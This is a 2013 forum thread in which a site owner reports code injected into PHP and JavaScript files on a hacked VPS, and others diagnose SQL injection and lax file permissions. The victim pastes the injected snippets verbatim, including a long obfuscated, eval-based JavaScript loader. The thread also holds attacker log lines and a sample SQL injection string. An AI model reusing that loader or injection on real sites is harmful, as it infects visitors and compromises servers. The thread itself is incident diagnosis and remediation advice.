Code Injection

[tommyboy123x]

I'm not sure this is the right place to post this, but here it goes...

 

There seems to have been something that happened on July 26th - I haven't touched these files in months, yet there's this code added in the most common PHP files (like index.php, login.php) and EVERY javascript file

 

php is as follows:

<?
#0f2490#
echo('<img src=\"http://localhost/\" >');
#/0f2490#
?>

and on all my javascript files:

/*0f2490*/
document.write('<img src="http://localhost/" >');
/*0f2490*/

The exact same issue as this guy (on the same date) - http://translate.google.com/translate?hl=en&sl=de&u=http://www.awardcafe.de/printthread.php%3Ftid%3D1513&prev=/search%3Fq%3D0f2490%2Blocalhost%2B0f2490%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26channel%3Dfflb%26biw%3D1162%26bih%3D581

 

 

Was my server compromised?  What steps can I take to ensure this doesn't happen again?

 

Its on a VPS I manage, so I wouldn't be too surprised if I ****ed something up, let me know what (if any) access logs you think may be relevant or even where to begin with this problem.

 

Thanks!

[lemmin]

Are you actually looking at the files' source directly or through the web browser? It looks suspiciously like Cross Site Scripting (XSS - http://hwang.cisdept.csupomona.edu/swa/content/xss.htm). If those files have been edited on the disk, my first guess would be SQL injection, but there are numerous other possibilities.

 

I would check EVERY log that you have. Access logs are a good place to start, but if you can find MySQL errors in your PHP logs, that is a red flag for injection.

[tommyboy123x]

I have this in my apache logs

 

[Fri Jul 26 23:47:25 2013] [error] [client 96.254.171.2] script '/var/www/azenv.php' not found or unable to stat

 

as well as a few other attempted fails at viewing directories and files that don't exist (such as /etc/apache2/htdocs and /var/www/config)

 

 

In the access log I have this:

96.254.171.2 - - [21/Jul/2013:01:30:02 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT ws NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"

 

96.254.171.2 - - [26/Jul/2013:07:56:15 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9$
77.73.5.166 - - [26/Jul/2013:07:56:32 +0000] "GET /wR38jPHK.gif HTTP/1.0" 200 262 "-" "Mozilla/5.0(Windows NT 5.0) AppleWebKit/5332 (KHTML, like Gecko) Chrome/13.0.813$
 

 

Still trying to track down my php error logs based on my php.ini files, I'll edit if found but is any of this suspicious to you?

[darkfreaks]

Error string found: 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use'

[Joshua F]

The only thing I could think of is an exploit somewhere, but if that's all they added I don't see the point of it since that wouldn't even really do anything.

[darkfreaks]

fix your MYSQL ERROR & injection in your script read up on using PDO to sanitize and clean SQL injection. (referring to login.php)

 

 

however doing so will NOT STOP CSRF attacks.

[tommyboy123x]

Thanks for the help - I thought login.php used mysql_real_escape_string.  A few years back I went through pretty carefully looking for XSS possibilities and other things like that, this must have been updated since then.

 

 

I'll assume this was an SQL injection of some kind and keep my eyes out for other exploit possiblities.

 

Thanks!

[darkfreaks]

let us know when this has been fixed thanks.

[tommyboy123x]

It'll be a few weeks before things are fully operational again, and I don't want to make the same mistake by doing my security checks before I'm finished (and creating these openings).

 

I have a hunch it was actually an exploit related to an on-site chat, which writes a string to a file to update the "last edited" time.  It is a "comet implementation" based on http://www.zeitoun.net/articles/comet_and_php/start.  I believe the attacker may have used this to gain write permissions.  I also got lazy and made my ftp account the same group as apache (and the owner of ALL web files) which may have contributed to this.

 

Anyways, login.php should be fixed for this particular exploit.  I'll keep this tab open and post in a couple weeks when I do a complete analysis.

[darkfreaks]

the error is fixed however the exploit remains on your password field.

[tommyboy123x]

Could you elaborate?  As far as I'm aware, there is no way to add an sql injection on this form... it does pass the data without mysql_real_escape_string but it also converts it into an md5 hash before adding to an SQL line.

 

 

I also believe this may have been possible because of my lax permission set.  A lot of these files were 775 by default, and I think 640 is really what I want.  Could this have been the cause?

 

 

 

I still can't find the PHP logs, can anyone tell me where to find clues that can help me piece together what happened?  It is a debian squeeze environment.

[darkfreaks]

mysql_real_escape_string has been deprecated as of php 5.5.0. you should be using PDO extension. this will take care of your SQL injection.

 

 

 

http://net.tutsplus.com/tutorials/php/why-you-should-be-using-phps-pdo-for-database-access/

 

my guess is yes md5 can't cause SQL injection but you probably are not escaping the password variable correctly. you would be better of using PDO.

 

 

also the password md5() algorithym is vunerable to exploitation as well as sha1().

 

 

i would recommend using the Blowfish Algorithm.

 

http://www.techrepublic.com/blog/australian-technology/securing-passwords-with-blowfish/

Edited August 13, 2013 by darkfreaks

[tommyboy123x]

Damn, thank you so much dark.... I didn't realize how out of touch I was.

 

I also wanted to give an update here - the attacker has attempted two other times to add some obfusicated javascirpt code in the js files... this is becoming a serious problem.

 

 

try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e85877e2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e85877e3c8180712e4b2e357682827e483d3d82738182403c767d818288773c717d7b3d777b753d44547085507c62523c7e767e3549182e85877e3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e85877e3c8182877a733c707d807273802e4b2e353e3549182e85877e3c8182877a733c7673777576822e4b2e35477e863549182e85877e3c8182877a733c85777282762e4b2e35457e863549182e85877e3c8182877a733c7a7374822e4b2e353f7e863549182e85877e3c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c8250875772363585877e3537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a3585877e6a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c8250875772363585877e35373c6f7e7e737c725176777a723685877e3749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

 

How are you testing these injections?  Are you convinced this is the cause of these attacks?  When I try something like "X' or 1=1" (without the quotes) I can't get it to work how I would expect.

 

 

I'll be back in a few days with the changes.

Edited August 18, 2013 by tommyboy123x